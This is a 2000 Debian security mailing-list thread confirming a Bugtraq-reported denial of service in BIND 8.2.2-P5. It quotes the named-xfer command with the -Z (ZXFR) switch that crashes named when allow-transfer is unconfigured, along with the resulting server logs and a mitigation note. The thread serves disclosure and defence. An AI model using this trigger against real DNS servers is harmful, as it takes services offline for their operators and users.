Re: Bind-8.2.2-P5 DOS
My hosts only are vulnerable when the allow_transfer { ... }; is not
configured in named.conf .. without it named dies after +- 1 minute, if
defined just an error message in /var/log/daemon ..
Arno Vije
On Thu, 9 Nov 2000, Jean-Marc Boursot wrote:
>
> Debian 2.2 IS vulnerable to the following DOS reported by Fabio
> Pietrosanti (naif) <fabio@TELEMAIL.IT> in bugtraq:
>
> <<
> Hi,
> playing with bind and ZXFR feature ( zone transfer compressed with a
> possible insecure execlp("gzip", "gzip", NULL); ), i discovered a
> Denial Of Service against Bind 8.2.2-P5 .
>
> By default Bind 8.2.2-P5 it's not compiled with ZXFR support unless
> you define it with #define BIND_ZXFR so it will refuse any ZXFR
> transfer, because it doesn't support it. But now what appens? Look
> here...
>
> ################################
> zone to transfer: zone.pippo.com
> dns server: dns.pippo.com 192.168.1.1
> me: naif.gatesux.com 10.10.10.10
> I send a Zone Trasnfer request using "-Z" switch with means that i wish to use ZXFR.
> dns.pippo.com does'nt support ZXFR and have "allow-transfer{}" not configured, so everyone
> could ask him for *.zone.pippo.com ...
>
> <naif@naif> [~/bind/src822p5/bin/named-xfer] $ ./named-xfer -z zone.pippo.com -d 9 -f pics -Z dns.pippo.com
> named-xfer[29297]: send AXFR query 0 to 192.168.1.1
> named-xfer[29297]: premature EOF, fetching "zone.pippo.com"
>
> On the server's log:
> Nov 7 11:19:09 dns.pippo.com: named[188510]: approved ZXFR from [10.10.10.10].2284 for "zone.pippo.com"
> Nov 7 11:19:09 dns.pippo.com: named[188510]: unsupported XFR (type ZXFR) of "zone.pippo.com" (IN) to [10.10.10.10].2284
>
> Then the server "*** CRASHED ***" .
>
> I should assume that bind 8.2.2-P5 it's vulnerable ( Please someone test and confirm this kind of dos)
> and bind-9.0.0 has no support for ZXFR .
>
> <naif@naif> [~/bind] $ find src822p5/ -type f -exec grep -i zxfr \{\} ';' | wc -l
> 234
> <naif@naif> [~/bind] $ find bind-9.0.0/ -type f -exec grep -i zxfr \{\} ';' | wc -l
> 0
>
> A lot of DNS Server are misconfigured, and allow zone-transfer to any, so they are dossable...
>
>
> naif
> naif@itapac.net
> >>
>
> Here is my daemon.log:
>
> Nov 9 15:13:19 ns12 named[137]: approved ZXFR from [192.168.1.10].1642 for "domain.org"
> Nov 9 15:13:19 ns12 named[137]: unsupported XFR (type ZXFR) of "domain.org" (IN) to [192.168.1.10].1642
> Nov 9 15:22:01 ns12 named[137]: db_update: DB_F_ACTIVE set
> Nov 9 15:22:01 ns12 named[137]: db_update: DB_F_ACTIVE set
>
> And named was down...
>
> Regards,
>
> Jean-Marc Boursot
>
>
> --
> To UNSUBSCRIBE, email to debian-security-request@lists.debian.org
> with a subject of "unsubscribe". Trouble? Contact listmaster@lists.debian.org
>
Reply to: